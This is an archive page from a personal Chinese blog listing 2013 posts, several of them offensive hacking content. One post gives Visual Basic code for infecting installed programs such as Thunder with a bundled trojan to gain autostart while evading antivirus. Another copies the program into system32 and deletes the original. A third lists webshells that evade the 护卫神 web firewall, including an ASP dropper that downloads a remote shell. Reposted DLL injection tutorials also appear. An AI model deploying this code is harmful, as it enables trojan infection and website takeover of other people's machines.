首页
动态
文章归档
友情链接
留言簿
关于
推荐
免费图床
统计
朋友圈集赞
二维码生成
高中笔记
Search
1
全网首发-小米AX6000路由器解锁ssh并固化ssh+2.5G有线mesh组网+公网访问路由后台+红米AX6/小米AX6/AX3600/AX6000/AX9000全系列适用
6,909 阅读
2
青龙面板必装依赖及青龙各种问题解决
3,947 阅读
3
NAS一键批量清除重复文件
3,596 阅读
4
群辉DSM7.0.1安装bootstrap后解决wget: error while loading shared libraries: libgnuintl.so.8: cannot open shared object file: No such file or directory
1,608 阅读
5
《爱情公寓4》全集高清迅雷下载
909 阅读
闲言碎语
学习
福利
技术百科
WordPress
Typecho
软件资源
iPhone
Android
PC软件
CODE
C
VB
PHP
NAS
青龙
登录
Search
标签搜索
wordpress
News
iphone
Typecho
vb
iOS
technology
渗透
QQ
php
NAS
hack
talk
福利
JavaScript
c++
diy
c
英语
免杀
Jonty
累计撰写
297
篇文章
累计收到
1,007
条评论
今日撰写
0
篇文章
首页
栏目
闲言碎语
学习
福利
技术百科
WordPress
Typecho
软件资源
iPhone
Android
PC软件
CODE
C
VB
PHP
NAS
青龙
页面
动态
文章归档
友情链接
留言簿
关于
推荐
免费图床
统计
朋友圈集赞
二维码生成
高中笔记
用户登录
登录
搜索到
285
篇与
Jonty
的结果
2013-07-26
博客大改~
准备大改博客。。要换个空间了。。这个空间便宜但是有点太慢了!主题也要换了。。看烦了这个主题。。到现在也不清楚自己的博客到底在弄些什么!!是时候好好想想了!今天。把空间换了。地址在新加坡,用了安全宝速度提升了不少,准备改主题!在苦逼的修改主题中。。完成时间:未知。。。2周以内。。--看中了Atheme的,但是下拉菜单有BUG,而且木有小工具啊!!。。苦逼的慢慢修改吧。。花七七提供了有小工具的--!十分感谢哈~--今天换了主题,这里要感谢花七七!!!!!!!!!推荐一款插件:W3 Total Cache 百度一下,然后百度百科你就知道它的强大!加速网站的哦~空间提供商把服务器搬到日本去了。。。所以速度变慢了!!!但是还凑活吧,流量翻倍了。。。
2013年07月26日
118 阅读
11 评论
0 点赞
2013-07-21
VB判断程序自身是否被修改(防脱壳)
以前写的,用了2个判别办法。1.检测自身文件大小 2.检测CRC32(当然也可以检测md5)补充几句:最简单的就是加个变态壳。。不然遇到高手这也是浮云。。先上图。代码如下:
2013年07月21日
111 阅读
0 评论
0 点赞
2013-07-17
2013挂载QQext的教程(显IP)
步骤1:在你安装QQ的目录建一个名为QQext的文件夹,把QQext解压后的所有文件复制到该文件夹。注:文件夹需建立到到D:\QQ\Bin,D:\代表你电脑上QQ的实际安装目录,默认的安装目录是C:\Program Files\Tencent\QQ\Bin。但如果你更改过安装路径请找到你实际安装的目录。步骤2:在D:\QQ\Bin\QQext\中运行gmd_editor.bat,如提示没有找到QQ,请按下确定关掉黑色dos窗口。右击gmd_editor.bat,选编辑,在记事本中设置正确的实际QQ安装的路径并保存。修改GMD编辑器中正确的QQ路径后保存。然后双击运行gmd_editor.bat成功后,将D:\QQ\中的common.xml.txd文件拖到弹出来的gmd编辑器的窗口。然后在里边找BEA07E3C-31B4-4F13-B8AA-BDBE0B8CCF43,将将下面的Common.dll改为qqext\qqext.dll。修改完毕后选菜单中的文件-另存为,保存到桌面:文件名:common.xml.txd步骤3:在D:\QQ\Bin\QQext\中右击qqext.ini,选编辑(如果没有编辑双击打开),找到proxydll=后,在=后边添加Common.dll,并保存。步骤4:重启电脑到安全模式(重启开机前按F8选择),在D:\QQ中重命名common.xml.txd为common.xml.txd-或者其他(此步操作是备份原文件。原名common.xml.txd),再把桌面上的common.xml.txd复制过来。步骤5:重启电脑到正常模式,启动QQ2013,你发现,QQext已经工作正常了。
2013年07月17日
109 阅读
0 评论
0 点赞
2013-07-14
VB之远控免杀之破杀软自启动
以前买了本书《终极免杀》,书还不错,主要是看中了360免杀的专题。里面就讲了这个方法来自启动。思路如下:查找系统指定软件路径(用注册表),然后把木马与主程序捆绑并替换。有些程序会自身检测。这个就要靠你自己了。源码中的资源文件放木马,源码感染的是迅雷,当然你可以改成别的!核心模块代码;Function GanRanExe(ByVal sFilePath As String) Dim MyArray() As Byte Dim CurrentSize As Long Dim FileArray() As Byte, FileArray1() As Byte Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 ReDim MyArray(LOF(1) - 1) Get #1, , MyArray Close #1 Open sFilePath For Binary Access Read As #1 ReDim FileArray(LOF(1) - 1) Get #1, , FileArray Close #1 FileArray1 = LoadResData(101, "CUSTOM") Kill sFilePath Open sFilePath For Binary Access Write As #1 Put #1, , MyArray Put #1, , FileArray CurrentSize = LOF(1) Put #1, , FileArray1 Put #1, , "GanRanFileTbide" & UBound(MyArray) + 1 & "," & UBound(FileArray) + 1 & "," & CurrentSize & "," & UBound(FileArray1) + 1 Close #1 End Function Function FenLiGanRanExe(ByVal FenLiToFilePath As String) On Error Resume Next Dim MyArray() As Byte Dim FileArray() As Byte Dim FenLiXinXi() As String Dim FenLiXinXiSize() As String Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 ReDim MyArray(LOF(1) - 1) Get #1, , MyArray FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide") FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",") ReDim FileArray(FenLiXinXiSize(1) - 1) Get #1, FenLiXinXiSize(0) + 1, FileArray Close #1 Kill FenLiToFilePath Open FenLiToFilePath For Binary Access Write As #1 Put #1, 1, FileArray Close #1 End Function Function FenLiGanRanExe1(ByVal FenLiToFilePath As String) On Error Resume Next Dim MyArray() As Byte Dim FileArray() As Byte Dim FenLiXinXi() As String Dim FenLiXinXiSize() As String Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 ReDim MyArray(LOF(1) - 1) Get #1, , MyArray FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide") FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",") ReDim FileArray(FenLiXinXiSize(3) - 1) Get #1, FenLiXinXiSize(2) + 1, FileArray Close #1 Kill FenLiToFilePath Open FenLiToFilePath For Binary Access Write As #1 Put #1, 1, FileArray Close #1 End Function Function TestGanRan(ByVal sFilePath As String) As Boolean Dim FileArray() As Byte Open sFilePath For Binary Access Read As #1 ReDim FileArray(LOF(1) - 1) Get #1, , FileArray Close #1 If InStr(StrConv(FileArray, vbUnicode), "GanRanFileTbide") > 0 Then TestGanRan = True Else TestGanRan = False End If End Function Public Function ReadReg(ByVal hKey) On Error Resume Next Set pReg = CreateObject("Wscript.Shell") ReadReg = pReg.RegRead(hKey) End Function Function PanDuanpath() As Boolean On Error Resume Next Dim thunderPath thunderPath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Thunder Network\ThunderOem\thunder_backwnd\dir") If Dir(thunderPath & "\Program\Thunder.exe") <> "" Then FrmMain.Combo1.AddItem thunderPath FrmMain.Combo1.Text = thunderPath Else End If Dim Qvodpath Qvodpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\QvodPlayer\Insert\Insertpath") If Dir(Qvodpath & "/QvodPlayer.exe") <> "" Then FrmMain.Combo1.AddItem Qvodpath FrmMain.Combo1.Text = Qvodpath Else End If Dim PPSpath PPSpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PPStream.exe\Path") If Dir(PPSpath & "/PPStream.exe") <> "" Then FrmMain.Combo1.AddItem PPSpath FrmMain.Combo1.Text = PPSpath Else End If End Function{anote icon="fa-download" href="http://pan.baidu.com/share/link?shareid=603098846&uk=1547026424" type="success" content="源码下载地址"/}
2013年07月14日
127 阅读
0 评论
0 点赞
2013-07-14
VB自删除+复制到系统目录
以前无聊写的声明文件复制到C盘属于敏感操作360绝对会提示或许可以先重命名为一个图片,再复制,再改后缀代码如下:Private Sub Form_Load() If Right(App.Path, 1) = "\" Then Path = App.Path ElseIf Right(App.Path, 1) <> "\" Then Path = App.Path + "\" End If If LCase(Path & App.EXEName & ".exe") <> LCase(Environ("windir") & "\system32\Jonty.exe") Then 'MsgBox Path & App.EXEName & ".exe" + vbCrLf + Environ("windir") & "\system32\Jonty.exe" FileCopy Path & App.EXEName & ".exe", Environ("windir") & "\system32\Jonty.exe" 'Shell Environ("windir") & "\system32\Jonty.exe", vbHide Call killmyself Shell Path & "killmyself.bat", vbHide End Else MsgBox "这里执行你要运行的文件" Call killmyself End End If End Sub Sub killmyself() Open App.Path & "\killmyself.bat" For Output As #1 '"@echo off" 不显示执行过程 Print #1, "@echo off" Print #1, "sleep 500" 'a.bat 删除指定文件 Print #1, "del " & App.EXEName + ".exe" 'a.bat 删除自身 Print #1, "del killmyself.bat" Print #1, "cls" Print #1, "exit" Close #1 End Sub
2013年07月14日
80 阅读
0 评论
0 点赞
2013-07-14
VB代码高亮记事本
网上收集的一款很不错的源码,速度很快!
2013年07月14日
84 阅读
0 评论
0 点赞
2013-07-10
过护卫神绕过方法总结
一、马儿篇,都是以前可以过护卫神的马二、注入篇,可以绕过注入的方法三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿一、马儿篇1号<!--?php <br ?--> @eval ($_POST['1']);?> 2号nono<!--?php <br ?--> eval ($_POST [1]) ?> 3号<!--?php $a = str_replace(x,””,”axsxxsxexrxxt”);<br ?--> $a($_POST["c"]); ?> 菜刀直接连,不需要构造连接字符串,密码 c类似于过安全狗的包含方法A.asp版本: 将一句话保存为 XX.jpg 上传后 地址为 …/xxxxxx.jpg 在上传一个 x.asp 内容为 <!–#include file=”../xxxxxx.jpg”–> B.php版本 如果是php的话: <!--?php <br ?--> include “1.htm”; ?>实在不行,还可以下载远程下载马<% Set xPost = CreateObject(“Microsoft.XMLHTTP”) xPost.Open “GET”,”http://www.xxx.com/123/1.txt”,False xPost.Send() Set sGet = CreateObject(“ADODB.Stream”) sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile Server.MapPath(“ls.asp”),2 set sGet = nothing set sPOST = nothing %> —————————————————————二、注入篇/*%00*/截断符 select/*%00*/* from admin; —————————————————————三、规则篇可以利用类似:<!--?php <br ?--> $code=’一串base64′; //base64编码 $x=str_replace(‘f’,””,”bfafsfef6f4f_ffdffeffcffoffdffef”); //字符串替换 $a = ‘/a/’;//正则规则 preg_replace($a,’e’.’v’.’a’.’l’.’(‘.$x.’(‘.$code.’))’,’a’); //正则替换 ?> 方法绕过关键词过滤
2013年07月10日
93 阅读
1 评论
0 点赞
2013-07-08
自己用的迅雷破解高速通道版
这个是我用过觉得最好的版本~ 直接上图: {anote icon="fa-download" href="http://pan.baidu.com/share/link?shareid=779462854&uk=1547026424" type="success" content="下载地址"/}
2013年07月08日
82 阅读
0 评论
0 点赞
2013-07-08
查看任意QQ空间最近收到的礼物总数、礼物详情、谁送的等等!
代码如下:http://drift.qzone.qq.com/cgi-bin/getrecvgift?uin=任意QQ
2013年07月08日
112 阅读
0 评论
0 点赞
2013-07-07
DLL注入技术之APC注入
APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:1)当EXE里某个线程执行到SleepEx()或者WaitForSingleObjectEx()时,系统就会产生一个软中断。2)当线程再次被唤醒时,此线程会首先执行APC队列中的被注册的函数。3)利用QueueUserAPC()这个API可以在软中断时向线程的APC队列插入一个函数指针,如果我们插入的是Loadlibrary()执行函数的话,就能达到注入DLL的目的。1.编写测试文件新建MFC工程,添加按钮控件,双击写代码如下所示:void CMfcTextApcInjectDlg::OnBnClickedSleepex() { // TODO: 在此添加控件通知处理程序代码 SleepEx(5000,TRUE); } 这里我们需要注意一下SleepEx中第二个参数为TRUE,查下msdn,上面写到:bAlertable [in] If this parameter is FALSE, the function does not return until the time-out period has elapsed. If an I/O completion callback occurs, the function does not return and the I/O completion function is not executed. If an APC is queued tothe thread, the function does not return and the APC function is not executed.大概意思是说当第二个参数为FALSE,APC是不被执行的,从此可以认为APC注入的使用条件还是有很大约束的。2.编写APC注入程序由于我们需要时使用LoadLibrary()函数完成注入,因此需要为其先准备好必要的参数,需要我们可以通过在远程进程中申请空间的方式写入LoadLibrary()函数所需要的参数(也就是DLL的路径)。关键代码如下所示://打开远程进程 handle = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId); if (handle) { //在远程进程申请空间 lpData = VirtualAllocEx(handle, NULL, 1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (lpData) { //在远程进程申请空间中写入待注入DLL的路径 bRet = WriteProcessMemory(handle, lpData, (LPVOID)sDllName, 1024,&dwRet); } //关闭句柄 CloseHandle(handle); } 当我们准备好用于注入DLL的LoadLibrary()函数后,接下来需要使用QueueUserAPC()函数将此函数插入到软中断线程的APC队列中。但是由于QueueUserAPC()函数的第三个参数是线程ID,因此我们需要根据现有进程ID,并通过遍历对比得到线程ID,具体API如下表所示:CreateToolhelp32Snapshot 创建线程快照 Thread32First 得到第一个线程快照 Thread32Next 循环下一个线程快照关键代码如下所示:THREADENTRY32 te = {0}; te.dwSize = sizeof(THREADENTRY32); //得到线程快照 HANDLE handleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0); if (INVALID_HANDLE_VALUE == handleSnap) { return FALSE; } BOOL bStat = FALSE; //得到第一个线程 if (Thread32First(handleSnap,&te)) { do { //进行进程ID对比 if (te.th32OwnerProcessID == dwProcessId) { //得到线程句柄 HANDLE handleThread = OpenThread( THREAD_ALL_ACCESS, FALSE, te.th32ThreadID); if (handleThread) { //向线程插入APC dwRet = QueueUserAPC( (PAPCFUNC)LoadLibrary, handleThread, (ULONG_PTR)lpData); if (dwRet > 0) { bStat = TRUE; } //关闭句柄 CloseHandle(handleThread); } } //循环下一个线程 } while (Thread32Next(handleSnap,&te)); } CloseHandle(handleSnap); 3.MFC工程设置和提升权限经过以上两步的操作,我们已经准备好APC注入的关键代码,现在我们需要将自己的程序提升权限以方便注入操作(另,动态MFC库编译有可能造成注入失败)。主要代码如下: int CApcInjectDll::EnablePrivilege(bool isStart) { //1. 得到令牌句柄 HANDLE hToken = NULL; //令牌句柄 if (!::OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_READ, &hToken)) { return FALSE; } //2. 得到特权值 LUID luid = {0}; //特权值 if (!::LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) { return FALSE; } //3. 提升令牌句柄权限 TOKEN_PRIVILEGES tp = {0}; //令牌新权限 tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; tp.Privileges[0].Attributes = isStart ? SE_PRIVILEGE_ENABLED : 0; if (!::AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)) { return FALSE; } //4. 关闭令牌句柄 ::CloseHandle(hToken); return 0; } 4.测试注入效果点击待注入的EXE进行SleepEx,这时EXE的窗口是不可以移动的,因为只有一个线程,处于SleepEx的挂起状态,然后进行注入,我们此时会发现处于挂起状态的进程窗口突然可以移动了,这是因为进程在挂起状态等待时,如果有APC队列就会退出等待并执行APC队列中的函数,然后程序继续运行。APC注入因为受目标进程使用API的条件而受限,并且处于等待的线程被注入后会立即返回,也有可能造成线程的运行错误,所以应用起来不是很通用。作者: xusir98来源: 黑客反病毒 (http://bbs.hackav.com)
2013年07月07日
88 阅读
0 评论
0 点赞
2013-07-07
DLL注入技术之依赖可信进程注入
依赖可信进程注入原理是利用Windows 系统中Services.exe这个权限较高的进程,首先将a.dll远线程注入到Services.exe中,再利用a.dll将b.dll远线程注入到待注入进程中。这里提供一个小技巧,当注入到Services.exe里的DLL时,想在做完事情后悄无声息的将自己释放掉,在Windows 中有这样的一个API函数FreeLibraryAndExitThread(),它可以把自己卸载掉并且退出线程,具体代码如下:DWORD ThreadProc(CMfcServicesInjectDLLApp* pThis) { //切换mfc模块 AFX_MANAGE_STATE(AfxGetStaticModuleState()); pThis->m_InjectObj.Attach( _T("calc.exe"), _T("D:\\MyDll\\RelyServicesInject\\Debug\\MfcExeInjectDLL.dll")); //在线程中卸载掉自己并且退出线程 FreeLibraryAndExitThread(pThis->m_hInstance,0); return 0; } // CMfcServicesInjectDLLApp 初始化 BOOL CMfcServicesInjectDLLApp::InitInstance() { DWORD dwThreadId; m_hThread = ::CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)ThreadProc, this, NULL,&dwThreadId); return TRUE; }依赖可信进程注入其实就是远线程注入的增强版,它利用了系统较高权限的进程进行远程注入,大大提高了注入的成功率,并在注入完毕后释放掉自己,降低了被查杀的可能性。作者: xusir98来源: 黑客反病毒 (http://bbs.hackav.com)
2013年07月07日
82 阅读
0 评论
0 点赞
2013-07-07
DLL注入技术之消息钩子注入
消息钩子注入原理是利用Windows 系统中SetWindowsHookEx()这个API,他可以拦截目标进程的消息到指定的DLL中导出的函数,利用这个特性,我们可以将DLL注入到指定进程中。1.准备阶段需要编写一个DLL,并且显式导出MyMessageProc()函数,主要代码如下:LRESULT WINAPI MyMessageProc(int code,WPARAM wParam,LPARAM lParam) { return CallNextHookEx(NULL, code, wParam, lParam); } 显示导出某个函数需要在.def文件中的EXPORTS填写MyMessageProc()2.HOOK阶段 使用SetWindowsHookEx()之前首先需要将HOOK的DLL 加载到本身的进程中,以此得到DLL的模块句柄,再使用GetProcAddress()得到DLL中显示导出的函数MyMessageProc()的函数地址,最后遍历出待注入进程的线程ID,这样SetWindowsHookEx()就可以利用这些参数进行HOOK了。主要代码如下所示://加载DLL到本身进程 hMod = LoadLibrary(pDllName); if(!hMod) return FALSE; //得到显示函数的地址 lpFunc = (DWORD)GetProcAddress(hMod, "MyMessageProc"); if(!lpFunc) { if(hMod) FreeLibrary(hMod); return FALSE; } //得到待注入EXE的进程ID dwProcessId = GetProcessId(pExeName); if(!dwProcessId) { if(hMod) FreeLibrary(hMod); return FALSE; } //得到待注入EXE的线程ID dwThreadId = GetThreadId(dwProcessId); if(!dwThreadId) { if(hMod) FreeLibrary(hMod); return FALSE; } //利用HOOK进行注入 hhook = SetWindowsHookEx( WH_GETMESSAGE,//WH_KEYBOARD,//WH_CALLWNDPROC, (HOOKPROC)lpFunc, hMod, dwThreadId); 3.释放阶段利用LoadLibrary()得到的模块句柄把本身进程的DLL释放掉,代码如下所示:if(hMod) FreeLibrary(hMod);消息钩子注入只需要对SetWindowsHookEx()和DLL导出函数有深刻的认识就可以很容编写,所以代码简单,比较容易实现。作者: xusir98来源: 黑客反病毒 (http://bbs.hackav.com)
2013年07月07日
80 阅读
0 评论
0 点赞
1
...
19
20
21
...
24